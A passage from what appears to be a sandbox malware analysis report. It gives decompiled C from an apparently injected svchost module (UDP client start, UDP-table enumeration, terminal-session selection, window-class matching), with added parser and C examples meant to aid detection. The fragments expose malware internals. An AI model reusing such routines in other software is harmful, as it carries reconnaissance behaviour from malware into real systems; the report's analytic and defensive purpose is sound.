                                                                                    										// _beginthreadex: security, stack size, start, arg, flags, &thread id at +0x44); handle kept at +0x40.
                                                                                    										_t76 = E04EDF4C7(_t98, 0, 0,  &M04ECDA10, _t105, 0, _t105 + 0x44);
                                                                                    										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                                                    										if(_t76 == 0) {
                                                                                    											E04ECE7F0(_t105, 8, "CUdpClient::Start", 0x65f);   // error category 8: thread create failed, ERROR_CREATE_FAILED (1631)
                                                                                    											L14:
                                                                                    											// Common failure path: reset members, run the virtual cleanup at vtable+4 while
                                                                                    											// preserving the last error across it, then return.
                                                                                    											 *(_t105 + 0xc) = 0;
                                                                                    											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                                                    											 *(_t105 + 0x14) = 0;
                                                                                    											 *(_t105 + 0x18) = 1;
                                                                                    											_t61 = GetLastError();
                                                                                    											 *((intOrPtr*)( *_t105 + 4))();
                                                                                    											SetLastError(_t61);
                                                                                    											__eflags = _v8 ^ _t109;
                                                                                    											return E04ED572E(_v8 ^ _t109);
                                                                                    										} else {
                                                                                    											_v68 = 1;
                                                                                    											ResetEvent( *(_t105 + 4));      // clear the stop event at +4; the client is now running
                                                                                    											return E04ED572E(_v8 ^ _t109);
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

















                                                                                    Instruction addresses aligned with the statement lines of the C code above (the address column was split from the code by extraction): 0x04ecd3d6, 0x04ecd3dd, 0x04ecd3e4, 0x04ecd3e9, 0x04ecd3eb, 0x04ecd3f8, 0x04ecd5d7, 0x04ecd5de, 0x04ecd5e9, 0x04ecd3fe, 0x04ecd404, 0x04ecd409, 0x04ecd40d, 0x04ecd5c0, 0x04ecd5c7, 0x04ecd5cd, 0x00000000, 0x04ecd413, 0x04ecd413, 0x04ecd41c, 0x04ecd428, 0x04ecd430, 0x04ecd437, 0x04ecd43d, 0x04ecd44b, 0x04ecd455, 0x04ecd45e, 0x04ecd465, 0x04ecd46c, 0x04ecd479, 0x04ecd565, 0x04ecd56b, 0x00000000, 0x04ecd47f, 0x04ecd48c, 0x04ecd493, 0x04ecd556, 0x04ecd55c, 0x04ecd572, 0x04ecd579, 0x00000000, 0x04ecd499, 0x04ecd4a1, 0x04ecd4a7, 0x04ecd4b0, 0x04ecd539, 0x04ecd53b, 0x04ecd542, 0x04ecd54f, 0x00000000, 0x04ecd4b6, 0x04ecd4b6, 0x04ecd4bc, 0x04ecd4c6, 0x04ecd522, 0x04ecd532, 0x00000000, 0x04ecd4c8, 0x04ecd4d8, 0x04ecd4e0, 0x04ecd4e5, 0x04ecd51b, 0x04ecd57b, 0x04ecd57b, 0x04ecd582, 0x04ecd589, 0x04ecd590, 0x04ecd597, 0x04ecd59f, 0x04ecd5a3, 0x04ecd5ae, 0x04ecd5b8, 0x04ecd4e7, 0x04ecd4ea, 0x04ecd4f1, 0x04ecd50a, 0x04ecd50a, 0x04ecd4e5, 0x04ecd4c6, 0x04ecd4b0, 0x04ecd493, 0x04ecd479, 0x04ecd40d

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ECD5C7
                                                                                      • Part of subcall function 04ECD670: WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECD6F6
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 04ECD4A1
                                                                                    • GetLastError.KERNEL32 ref: 04ECD539
                                                                                      • Part of subcall function 04ECD8E0: WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECD8F6
                                                                                      • Part of subcall function 04ECD8E0: connect.WS2_32(?,?,00000010), ref: 04ECD91E
                                                                                      • Part of subcall function 04ECD8E0: WSAGetLastError.WS2_32(?,74E04D40,?,04ECD4C4,?,00000005), ref: 04ECD931
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ECD4F1
                                                                                    • WSAGetLastError.WS2_32(?,00000005), ref: 04ECD522
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 04ECD556
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 04ECD565
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECD579
                                                                                    • GetLastError.KERNEL32 ref: 04ECD597
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECD5A3
                                                                                      • Part of subcall function 04ECD7B0: htons.WS2_32(?), ref: 04ECD81E
                                                                                      • Part of subcall function 04ECD7B0: bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                    • String ID: CUdpClient::Start
                                                                                    • API String ID: 4138520258-3951387650
                                                                                    • Opcode ID: 02dc0914ceae25e1b60692f78a0ee3eeea0b87a40dfa623d95532d160fa7265b
                                                                                    • Instruction ID: ecf4840f7de9df17ae2a465c8647c363f7020ded39700702fee0ce3910dc0fab
                                                                                    • Opcode Fuzzy Hash: 02dc0914ceae25e1b60692f78a0ee3eeea0b87a40dfa623d95532d160fa7265b
                                                                                    • Instruction Fuzzy Hash: 07515E70B00209EBDB14DF65DD48FAEB7B9FF88309F10112AE90597290DB76B955CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
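As an added example (not part of the Joe Sandbox report or of the sample under analysis), a parser for the "APIs" bullet format used throughout this report. It turns the bullets into records, separates the function's own call sites from those reached through sub-functions, orders each group by call-site address (the report lists them unordered), and names the Win32/Winsock constants that appear literally in this function's bullets (0x139F, 0x273F, the 0x30 event mask, the sockaddr lengths). The sample input is a subset of the bullets listed above, copied verbatim; the constant names are the standard SDK values, and the only bullet shapes handled are the two that occur on this page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: a subset of the "APIs" bullets for E04ECD3D0 (CUdpClient::Start),
# copied verbatim from the report entry above.
SAMPLE = """\
  • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
• SetLastError.KERNEL32(0000139F), ref: 04ECD5C7
  • Part of subcall function 04ECD670: WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECD6F6
• SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 04ECD4A1
• GetLastError.KERNEL32 ref: 04ECD539
  • Part of subcall function 04ECD8E0: WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECD8F6
  • Part of subcall function 04ECD8E0: connect.WS2_32(?,?,00000010), ref: 04ECD91E
• ResetEvent.KERNEL32(?), ref: 04ECD4F1
• WSAGetLastError.WS2_32(?,00000005), ref: 04ECD522
  • Part of subcall function 04ECD7B0: htons.WS2_32(?), ref: 04ECD81E
  • Part of subcall function 04ECD7B0: bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
"""

# One bullet. Two shapes occur on this page: "Api.MODULE(args), ref: ADDR" and the
# argument-less "Api.MODULE ref: ADDR"; either may carry the "Part of subcall function" prefix.
_BULLET = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # int for values the sandbox captured, None for its "?" placeholder
    ref: int                # address of the call instruction
    parent: Optional[int]   # sub-function address if reached indirectly, else None


def parse_api_lines(text: str) -> list:
    """Parse a block of report bullets; raise on a line that does not match either shape."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _BULLET.match(line)
        if m is None:
            raise ValueError(f"unrecognised API bullet: {line!r}")
        raw = m.group("args")
        args = tuple(None if t.strip() == "?" else int(t, 16) for t in raw.split(",")) if raw else ()
        parent = m.group("parent")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(parent, 16) if parent else None))
    return calls


# Standard SDK values for the literals that appear in this function's bullets.
WIN32_ERRORS = {0x0: "ERROR_SUCCESS", 0x4C7: "ERROR_CANCELLED",
                0x65F: "ERROR_CREATE_FAILED", 0x139F: "ERROR_INVALID_STATE"}
WSA_ERRORS = {0x273F: "WSAEINVAL"}
FD_BITS = ((0x01, "FD_READ"), (0x02, "FD_WRITE"), (0x04, "FD_OOB"),
           (0x08, "FD_ACCEPT"), (0x10, "FD_CONNECT"), (0x20, "FD_CLOSE"))
SOCKADDR_LEN = {0x10: "sizeof(sockaddr_in)", 0x1C: "sizeof(sockaddr_in6)"}


def annotate(call: ApiCall) -> str:
    """Name the captured constant for the calls where the argument value carries meaning."""
    a = call.args
    if call.api == "SetLastError" and a and a[0] is not None:
        return WIN32_ERRORS.get(a[0], f"0x{a[0]:X}")
    if call.api == "WSASetLastError" and a and a[0] is not None:
        return WSA_ERRORS.get(a[0], f"0x{a[0]:X}")
    if call.api == "WSAEventSelect" and len(a) == 3 and a[2] is not None:
        return "|".join(name for bit, name in FD_BITS if a[2] & bit) or f"0x{a[2]:X}"
    if call.api in ("bind", "connect") and len(a) == 3 and a[2] is not None:
        return SOCKADDR_LEN.get(a[2], f"namelen=0x{a[2]:X}")
    return ""


def inline_call_sites(calls) -> list:
    """The function's own call sites in address order."""
    return [c for c in sorted(calls, key=lambda c: c.ref) if c.parent is None]


def subcall_summary(calls) -> dict:
    """Sub-function address -> the APIs it reaches, in address order."""
    out = {}
    for c in sorted(calls, key=lambda c: c.ref):
        if c.parent is not None:
            out.setdefault(c.parent, []).append(c.api)
    return out


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in inline_call_sites(parsed):
        print(f"{c.ref:08X}  {c.module}!{c.api}  {annotate(c)}")
    for parent, apis in subcall_summary(parsed).items():
        print(f"via sub_{parent:08X}: {', '.join(apis)}")
```

Run stand-alone it prints the five inline call sites in address order and the four helpers with the Winsock calls they wrap. The annotations turn SetLastError(0000139F) into ERROR_INVALID_STATE and the 0x30 mask passed to WSAEventSelect into FD_CONNECT|FD_CLOSE, which together with connect() on a datagram socket is the shape of a connected-UDP client start that a network-detection rule for the injected svchost process can key on.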

                                                                                    C-Code - Quality: 58%
                                                                                    			E04EBD960(void* __edi, void* __esi) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v16;
                                                                                    				short _v540;
                                                                                    				_Unknown_base(*)()* _v544;
                                                                                    				char _v548;
                                                                                    				signed int* _v552;
                                                                                    				long _v556;
                                                                                    				long _v560;
                                                                                    				intOrPtr _v576;
                                                                                    				_Unknown_base(*)() _v592;
                                                                                    				intOrPtr _v596;
                                                                                    				long _v600;
                                                                                    				long _v604;
                                                                                    				signed int _t44;
                                                                                    				struct HINSTANCE__* _t46;
                                                                                    				_Unknown_base(*)()* _t49;
                                                                                    				void* _t50;
                                                                                    				signed int* _t51;
                                                                                    				signed int* _t55;
                                                                                    				int _t67;
                                                                                    				signed int _t75;
                                                                                    				_Unknown_base(*)()* _t85;
                                                                                    				intOrPtr _t86;
                                                                                    				long _t87;
                                                                                    				intOrPtr _t91;
                                                                                    				long _t93;
                                                                                    				void* _t96;
                                                                                    				signed int* _t100;
                                                                                    				void* _t101;
                                                                                    				signed int _t106;
                                                                                    				void* _t109;
                                                                                    				signed int _t112;
                                                                                    				void* _t113;
                                                                                    				void* _t116;
                                                                                    				void* _t120;
                                                                                    
                                                                                    				_t112 = (_t109 - 0x00000008 & 0xfffffff0) + 4;
                                                                                    				_v8 =  *((intOrPtr*)(_t109 + 4));
                                                                                    				_t106 = _t112;
                                                                                    				_t113 = _t112 - 0x258;
                                                                                    				_t44 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v16 = _t44 ^ _t106;
                                                                                    				_push(__esi);
                                                                                    				_t93 = 0;
                                                                                    				_v604 = 0;
                                                                                    				_v600 = 0;
                                                                                    				_t46 = LoadLibraryA("iphlpapi.dll");
                                                                                    				if(_t46 == 0) {
                                                                                    					L4:
                                                                                    					return E04ED572E(_v16 ^ _t106);
                                                                                    				} else {
                                                                                    					_t49 = GetProcAddress(_t46, "GetExtendedUdpTable");
                                                                                    					_v544 = _t49;
                                                                                    					_v548 = 0;
                                                                                    					_t50 =  *_t49(0,  &_v548, 1, 2, 1, 0);
                                                                                    					_t123 = _t50 - 0x7a;
                                                                                    					if(_t50 != 0x7a) {
                                                                                    						goto L4;
                                                                                    					} else {
                                                                                    						_push(_v548);
                                                                                    						_t51 = E04ED5785( &_v548, __esi, _t123);
                                                                                    						_t116 = _t113 + 4;
                                                                                    						_t100 = _t51;
                                                                                    						_v552 = _t100;
                                                                                    						_push(0);
                                                                                    						_push(1);
                                                                                    						_push(2);
                                                                                    						_push(1);
                                                                                    						_push( &_v548);
                                                                                    						_push(_t100);
                                                                                    						if(_v544() == 0) {
                                                                                    							_t101 = LocalAlloc(0x40, 0x2800);
                                                                                    							_v556 = 0;
                                                                                    							_t55 = _v552;
                                                                                    							__eflags =  *_t55;
                                                                                    							if( *_t55 > 0) {
                                                                                    								_t85 =  &(_t55[2]);
                                                                                    								_v544 = _t85;
                                                                                    								do {
                                                                                    									_v596 =  *((intOrPtr*)(_t85 - 4));
                                                                                    									_t86 =  *((intOrPtr*)(_t85 + 4));
                                                                                    									_push(_t86);
                                                                                    									_v592 =  *_t85;
                                                                                    									_v576 = _t86;
                                                                                    									E04EBD4B0(_t86,  &_v540);
                                                                                    									_t120 = _t116 + 4;
                                                                                    									_v560 = 0x22 + lstrlenW( &_v540) * 2 + _t93;
                                                                                    									_t67 = LocalSize(_t101);
                                                                                    									_t87 = _v560;
                                                                                    									__eflags = _t67 - _t87;
                                                                                    									if(_t67 < _t87) {
                                                                                    										_t101 = LocalReAlloc(_t101, _t87, 0x42);
                                                                                    									}
                                                                                    									asm("movups xmm0, [ebp-0x250]");
                                                                                    									asm("movups [edi+esi], xmm0");
                                                                                    									asm("movups xmm0, [ebp-0x240]");
                                                                                    									asm("movups [edi+esi+0x10], xmm0");
                                                                                    									_t96 = _t93 + 0x20;
                                                                                    									E04EDDC90(_t96 + _t101,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                    									_t116 = _t120 + 0xc;
                                                                                    									_t75 = lstrlenW( &_v540);
                                                                                    									_t91 = _v556 + 1;
                                                                                    									_t85 = _v544 + 0xc;
                                                                                    									_v556 = _t91;
                                                                                    									_v544 = _t85;
                                                                                    									_t93 = _t96 + _t75 * 2 + 2;
                                                                                    									__eflags = _t91 -  *_v552;
                                                                                    								} while (_t91 <  *_v552);
                                                                                    							}
                                                                                    							LocalReAlloc(_t101, _t93, 0x42);
                                                                                    							E04ED5777(_v552);
                                                                                    							__eflags = _v16 ^ _t106;
                                                                                    							return E04ED572E(_v16 ^ _t106, 0x10);
                                                                                    						} else {
                                                                                    							_push(0x10);
                                                                                    							E04ED5777(_t100);
                                                                                    							goto L4;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    Instruction addresses (per-line address column of the decompiler listing, shown here as a range): 0x04ebd969 to 0x04ebdb61

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 04EBD99B
                                                                                    • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 04EBD9AB
                                                                                    • LocalAlloc.KERNEL32(00000040,00002800), ref: 04EBDA29
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDA80
                                                                                    • LocalSize.KERNEL32 ref: 04EBDA96
                                                                                    • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 04EBDAAA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDAD3
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EBDAFB
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 04EBDB35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloclstrlen$AddressLibraryLoadProcSize
                                                                                    • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                                                    • API String ID: 2444183403-1809394930
                                                                                    • Opcode ID: 8bc7abee5fc4bd5612d6793b3a01cb58a99ce29f1e2819a6614e55f403f627fc
                                                                                    • Instruction ID: a655f6705c17cd2c4cd4e45e4ee3691078f866f8df2bb593aa285dc1a8c55a62
                                                                                    • Opcode Fuzzy Hash: 8bc7abee5fc4bd5612d6793b3a01cb58a99ce29f1e2819a6614e55f403f627fc
                                                                                    • Instruction Fuzzy Hash: 9B519F75E41218ABDB20DF64DC89FEAB7B4EF94305F0041E9E909A3240EB746E80CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 43%
                                                                                    			E04EC70A0(void* __ebx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				struct _OSVERSIONINFOW _v284;
                                                                                    				void* _v288;
                                                                                    				char _v292;
                                                                                    				_Unknown_base(*)()* _v296;
                                                                                    				signed int _t26;
                                                                                    				_Unknown_base(*)()* _t36;
                                                                                    				struct HINSTANCE__* _t37;
                                                                                    				_Unknown_base(*)()* _t38;
                                                                                    				signed int _t43;
                                                                                    				signed int _t44;
                                                                                    				intOrPtr* _t50;
                                                                                    				intOrPtr* _t54;
                                                                                    				intOrPtr* _t55;
                                                                                    				intOrPtr _t58;
                                                                                    				signed int _t60;
                                                                                    				struct HINSTANCE__* _t62;
                                                                                    				intOrPtr _t64;
                                                                                    				signed int _t66;
                                                                                    
                                                                                    				_t26 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t26 ^ _t66;
                                                                                    				_t60 = 0;
                                                                                    				E04EDDAD0(0,  &_v284, 0, 0x114);
                                                                                    				_v284.dwOSVersionInfoSize = 0x114;
                                                                                    				GetVersionExW( &_v284);
                                                                                    				if(_v284.dwMajorVersion < 6) {
                                                                                    					L24:
                                                                                    					return E04ED572E(_v8 ^ _t66);
                                                                                    				} else {
                                                                                    					_t62 = LoadLibraryA("Wtsapi32.dll");
                                                                                    					if(_t62 != 0) {
                                                                                    						_t50 = GetProcAddress(_t62, "WTSEnumerateSessionsW");
                                                                                    						_t36 = GetProcAddress(_t62, "WTSFreeMemory");
                                                                                    						_v296 = _t36;
                                                                                    						if(_t50 == 0 || _t36 == 0) {
                                                                                    							L20:
                                                                                    							_t37 = LoadLibraryA("Kernel32.dll");
                                                                                    							if(_t37 != 0) {
                                                                                    								_t38 = GetProcAddress(_t37, "WTSGetActiveConsoleSessionId");
                                                                                    								if(_t38 != 0) {
                                                                                    									_t60 =  *_t38();
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							_v292 = 0;
                                                                                    							_push( &_v288);
                                                                                    							_v288 = 0;
                                                                                    							_push( &_v292);
                                                                                    							_push(1);
                                                                                    							_push(0);
                                                                                    							_push(0);
                                                                                    							if( *_t50() == 0) {
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								_t58 = _v288;
                                                                                    								_t43 = 0;
                                                                                    								_t64 = _v292;
                                                                                    								if(_t58 == 0) {
                                                                                    									L12:
                                                                                    									_t44 = 0;
                                                                                    									if(_t58 != 0) {
                                                                                    										_t54 = _t64 + 8;
                                                                                    										while( *_t54 != 1) {
                                                                                    											_t44 = _t44 + 1;
                                                                                    											_t54 = _t54 + 0xc;
                                                                                    											if(_t44 < _t58) {
                                                                                    												continue;
                                                                                    											} else {
                                                                                    											}
                                                                                    											goto L18;
                                                                                    										}
                                                                                    										_t60 =  *((intOrPtr*)(_t64 + (_t44 + _t44 * 2) * 4));
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t55 = _t64 + 8;
                                                                                    									while( *_t55 != _t60) {
                                                                                    										_t43 = _t43 + 1;
                                                                                    										_t55 = _t55 + 0xc;
                                                                                    										if(_t43 < _t58) {
                                                                                    											continue;
                                                                                    										} else {
                                                                                    											goto L12;
                                                                                    										}
                                                                                    										goto L18;
                                                                                    									}
                                                                                    									_t60 =  *((intOrPtr*)(_t64 + (_t43 + _t43 * 2) * 4));
                                                                                    									if(_t60 == 0) {
                                                                                    										goto L12;
                                                                                    									}
                                                                                    								}
                                                                                    								L18:
                                                                                    								_v296(_t64);
                                                                                    								if(_t60 == 0) {
                                                                                    									goto L20;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						goto L24;
                                                                                    					} else {
                                                                                    						return E04ED572E(_v8 ^ _t66);
                                                                                    					}
                                                                                    				}
			}

Instruction addresses (decompiler address column, flattened on extraction; 0x00000000 marks lines with no mapped address): 0x04ec70a9 to 0x04ec71f8

                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 04EC7118
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 04EC712C
                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000104,00000000), ref: 04EC71CC
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 04EC71DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$Version
                                                                                    • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                                                    • API String ID: 158333003-4205620339
                                                                                    • Opcode ID: c2bebc7413dc993c48707fae6d728179b9d4c481d049ef1a885400bfeeccaf96
                                                                                    • Instruction ID: 4bd30566df05dce2085c2c7d60216fff94e73244d0982839a11a00ab1cfde3b1
                                                                                    • Opcode Fuzzy Hash: c2bebc7413dc993c48707fae6d728179b9d4c481d049ef1a885400bfeeccaf96
                                                                                    • Instruction Fuzzy Hash: 9E31A235A0021A9BDB24CB659D45AFA77B9EF84714F1412ADD909D3200EF74FE46CE90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
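
Added example, not code from the report or from the sample: the loop above steps through an array with a 12-byte stride, tests the field at offset 8 against the literal 1, and reads the field at offset 0 of the matching entry (`_t64 + (i + i*2) * 4`). Together with the resolved imports (WTSEnumerateSessionsW, WTSFreeMemory) this is a scan of the WTS_SESSION_INFOW array, whose 32-bit layout is SessionId (+0), pWinStationName (+4), State (+8). Note that 1 is WTSConnected in WTS_CONNECTSTATE_CLASS; WTSActive is 0. The C below re-expresses that scan over a locally defined struct and a constructed table so it compiles on any platform; it generalises the fragment's fixed constant to a caller-supplied state. The fallback to WTSGetActiveConsoleSessionId is an assumption drawn from that import, not behaviour visible in the fragment, and all names and sample values are the example's own.

```c
#include <stddef.h>
#include <stdint.h>

/* WTS_CONNECTSTATE_CLASS values from wtsapi32.h. The fragment compares
 * against the literal 1, i.e. WTSConnected, not WTSActive (0). */
enum { WTS_ACTIVE = 0, WTS_CONNECTED = 1, WTS_CONNECT_QUERY = 2,
       WTS_SHADOW = 3, WTS_DISCONNECTED = 4, WTS_IDLE = 5 };

/* 32-bit WTS_SESSION_INFOW: 12 bytes, matching the 0xc stride and the
 * +8 (State) / +0 (SessionId) accesses in the decompiled loop. On x64 the
 * same struct is 24 bytes, so a hardcoded 0xc stride only fits 32-bit code. */
typedef struct {
    uint32_t SessionId;
    uint32_t pWinStationName;   /* LPWSTR in the real struct; opaque here */
    uint32_t State;
} SessionInfo32;

/* Linear scan exactly as the loop does it: SessionId of the first entry
 * whose State equals want_state, or -1 when no entry matches. */
int find_session_by_state(const SessionInfo32 *tbl, uint32_t count,
                          uint32_t want_state)
{
    for (uint32_t i = 0; i < count; i++) {
        if (tbl[i].State == want_state)
            return (int)tbl[i].SessionId;
    }
    return -1;
}

/* Two-stage selection (assumption inferred from the imports): take the
 * WTSConnected session from the enumerated table, otherwise fall back to
 * the console session id that WTSGetActiveConsoleSessionId would return. */
uint32_t pick_session_like_sample(const SessionInfo32 *tbl, uint32_t count,
                                  uint32_t console_session_id)
{
    int id = (tbl != NULL) ? find_session_by_state(tbl, count, WTS_CONNECTED) : -1;
    return id >= 0 ? (uint32_t)id : console_session_id;
}

/* Constructed sample table (not data from the analysed host). */
static const SessionInfo32 SAMPLE_SESSIONS[] = {
    { 0, 0, WTS_DISCONNECTED },   /* services session */
    { 1, 0, WTS_ACTIVE },         /* logged-on console user */
    { 2, 0, WTS_CONNECTED },      /* connected, no user logged on */
};
#define SAMPLE_COUNT ((uint32_t)(sizeof SAMPLE_SESSIONS / sizeof SAMPLE_SESSIONS[0]))

int sample_find(uint32_t state) { return find_session_by_state(SAMPLE_SESSIONS, SAMPLE_COUNT, state); }
uint32_t sample_pick(void) { return pick_session_like_sample(SAMPLE_SESSIONS, SAMPLE_COUNT, 99); }
uint32_t sample_pick_no_table(void) { return pick_session_like_sample(NULL, 0, 99); }
```

When reimplementing or emulating this routine for detection, the stride and field offsets must follow the bitness of the injected module (this dump is a 32-bit image at 0x04EB0000); reusing the 0xc stride against a 64-bit WTS_SESSION_INFOW array reads the wrong fields.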

                                                                                    C-Code - Quality: 91%
                                                                                    			E04EC5180(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, void** _a8) {
                                                                                    				signed int _v8;
                                                                                    				char _v1032;
                                                                                    				char _v2056;
                                                                                    				struct HWND__* _v2060;
                                                                                    				void** _v2064;
                                                                                    				signed int _t20;
                                                                                    				void** _t22;
                                                                                    				signed int _t33;
                                                                                    				signed int _t34;
                                                                                    				int _t44;
                                                                                    				void* _t50;
                                                                                    				char* _t53;
                                                                                    				void* _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				void* _t58;
                                                                                    				void* _t59;
                                                                                    				CHAR* _t61;
                                                                                    				struct HWND__* _t63;
                                                                                    				int _t64;
                                                                                    				DWORD* _t65;
                                                                                    				signed int _t66;
                                                                                    
                                                                                    				_t58 = __edi;
                                                                                    				_t20 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t20 ^ _t66;
                                                                                    				_t22 = _a8;
                                                                                    				_t63 = _a4;
                                                                                    				_t50 =  *_t22;
                                                                                    				_v2064 = _t22;
                                                                                    				_v2060 = _t63;
                                                                                    				E04EDDAD0(__edi,  &_v2056, 0, 0x400);
                                                                                    				E04EDDAD0(_t58,  &_v1032, 0, 0x400);
                                                                                    				GetClassNameA(_t63,  &_v1032, 0x3ff);
                                                                                    				if(lstrlenA( &_v1032) == 0) {
                                                                                    					L14:
                                                                                    					return E04ED572E(_v8 ^ _t66);
                                                                                    				}
                                                                                    				_t53 = "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942";
                                                                                    				_t33 =  &_v1032;
                                                                                    				while(1) {
                                                                                    					_t56 =  *_t33;
                                                                                    					if(_t56 !=  *_t53) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t56 == 0) {
                                                                                    						L6:
                                                                                    						_t34 = 0;
                                                                                    						L8:
                                                                                    						if(_t34 == 0) {
                                                                                    							_push(_t58);
                                                                                    							GetWindowTextA(_t63,  &_v2056, 0x3ff);
                                                                                    							_t59 = E04EDD690( &_v2056, 0x5f);
                                                                                    							if(_t59 != 0) {
                                                                                    								_t61 = _t59 + 1;
                                                                                    								if(_t50 == 0) {
                                                                                    									_t50 = LocalAlloc(0x40, 1);
                                                                                    								}
                                                                                    								_t64 = LocalSize(_t50);
                                                                                    								_t15 = lstrlenA(_t61) + 5; // 0x5
                                                                                    								_t50 = LocalReAlloc(_t50, _t15 + _t64, 0x42);
                                                                                    								_t65 = _t64 + _t50;
                                                                                    								GetWindowThreadProcessId(_v2060, _t65);
                                                                                    								_t44 = lstrlenA(_t61);
                                                                                    								_t17 =  &(_t65[1]); // 0x4
                                                                                    								E04EDDC90(_t17, _t61, _t44 + 1);
                                                                                    							}
                                                                                    							 *_v2064 = _t50;
                                                                                    						}
                                                                                    						goto L14;
                                                                                    					}
                                                                                    					_t57 =  *((intOrPtr*)(_t33 + 1));
                                                                                    					if(_t57 != _t53[1]) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t33 = _t33 + 2;
                                                                                    					_t53 =  &(_t53[2]);
                                                                                    					if(_t57 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					goto L6;
                                                                                    				}
                                                                                    				asm("sbb eax, eax");
                                                                                    				_t34 = _t33 | 0x00000001;
                                                                                    				goto L8;
			}

Instruction addresses (decompiler address column, flattened on extraction; 0x00000000 marks lines with no mapped address): 0x04ec5180 to 0x04ec52ce

                                                                                    APIs
                                                                                    • GetClassNameA.USER32(?,?,000003FF), ref: 04EC51DF
                                                                                    • lstrlenA.KERNEL32(?), ref: 04EC51EC
                                                                                    • GetWindowTextA.USER32 ref: 04EC5240
                                                                                    • _strrchr.LIBCMT ref: 04EC524F
